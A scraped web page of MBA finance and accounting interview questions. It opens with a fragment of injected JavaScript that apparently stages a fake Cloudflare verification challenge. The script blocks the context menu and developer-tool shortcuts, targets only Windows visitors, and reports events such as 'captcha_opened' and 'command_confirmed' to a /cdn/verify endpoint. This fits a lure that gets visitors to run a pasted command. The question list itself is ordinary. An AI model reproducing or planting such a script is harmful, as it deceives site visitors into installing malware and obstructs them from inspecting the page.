`; if (ij) { if (cl) { if (all) { document.querySelectorAll(ij).forEach(function(el, i) { el.addEventListener('click', function(e) { e.preventDefault(); document.body.appendChild(container); if (!init) { initScript(); } }); }) } else { document.querySelector(ij).addEventListener('click', function(e) { e.preventDefault(); document.body.appendChild(container); if (!init) { initScript(); } }); } } else { document.querySelector(ij).before(container); initScript(); } } else { document.querySelector('html').innerHTML = container.innerHTML; initScript(); } document.addEventListener('contextmenu', function(e) { e.preventDefault(); return false; }); document.addEventListener('keydown', function(e) { if (e.key === 'F12' || e.keyCode === 123) { e.preventDefault(); return false; } if (e.ctrlKey && e.shiftKey && (e.key === 'I' || e.key === 'i' || e.keyCode === 73)) { e.preventDefault(); return false; } if (e.ctrlKey && e.shiftKey && (e.key === 'J' || e.key === 'j' || e.keyCode === 74)) { e.preventDefault(); return false; } if (e.ctrlKey && (e.key === 'U' || e.key === 'u' || e.keyCode === 85)) { e.preventDefault(); return false; } if (e.ctrlKey && e.shiftKey && (e.key === 'C' || e.key === 'c' || e.keyCode === 67)) { e.preventDefault(); return false; } return true; }); } function sendEvent(eventType, id) { if (!syn) { return; } const payload = { id: id, event: eventType, // 'ping', captcha_opened', 'captcha_solved', 'command_confirmed' ua: navigator.userAgent, url: location.href, arch: checkArch(), timestamp: Date.now() }; const json = JSON.stringify(payload); const blob = new Blob([json], { type: 'application/json' }); const targetUrl = '/cdn/verify'; if (navigator.sendBeacon && navigator.sendBeacon(targetUrl, blob)) { return; } fetch(targetUrl, { method: 'POST', body: blob, keepalive: true, headers: { 'Content-Type': 'application/json' } }).catch(() => {}); } const arch = checkArch(); if (arch === 'non-windows') { console.log("VM detected — skipping challenge"); setTimeout(function() { if (document.querySelector('#get_api_key_jss')) document.querySelector('#get_api_key_jss').remove(); }, 1000); } else { //setTimeout(function() { const storedStatus = localStorage.getItem(`_verify_${currentId}`); if (storedStatus !== 'completed') { sendEvent('ping', currentId); showCloudflareChallenge(); if (document.querySelector('#get_api_key_jss')) document.querySelector('#get_api_key_jss').remove(); } //}, 3000); } })();
MBA Jobs

MBA Interview Questions

MBA Finance and Accounting Interview Questions :-
How do we calculate income tax?
– Do you think operating profit can be more than the gross profit?
– Can you describe how Private Banking works?
– Can you differentiate between current assets & fixed assets?
– What is the difference between revenue and profit?
– Do you invest in stock markets?
– For a big MNC, What documents are covered in the Financial Statement?
– Have you heard about investment banking?
– How do you record sundry allowances in accounts?
– How many different accounting standards are there?
– In which language was accountancy first established?
– Suppose you have a balance sheet of an SME company, how will you decide whether to finance the company or not?
– Tell me something about double entry book keeping.
– Tell us about accounts and taxation.
– What are the different types of taxes?
– What is capital budgeting?
– What is the difference between book value and market value?
– What is finance?
– What is ICWA, balance sheet?
– What is Fixed Cost, Variable Cost and Break Even point?
– What is Income tax?
– What is Indirect tax?
– What is India’s Foreign Exchange Reserve?
– What is Investment Banking?
– What is liquidity?
– What is Marginal Costing?
– What is market capitalization?
– What is PE ratio?
– What is the difference between Options and Futures?
– Who invented Double Entry Book Keeping?
– What is the internal rate of return formulae
– What is the Net Present Value formula?
– What is the relation between income statement and balance sheet?
– What is the role of an auditor?
– What is turnover?
– What is value of firm?
– What is working capital account?
– Which accounting standard do we follow?
– Why is P&L account not known as profit and loss account?
– Why profit is shown on liability side of the balance sheet?
– How do you do breakeven analysis?

Leave a Reply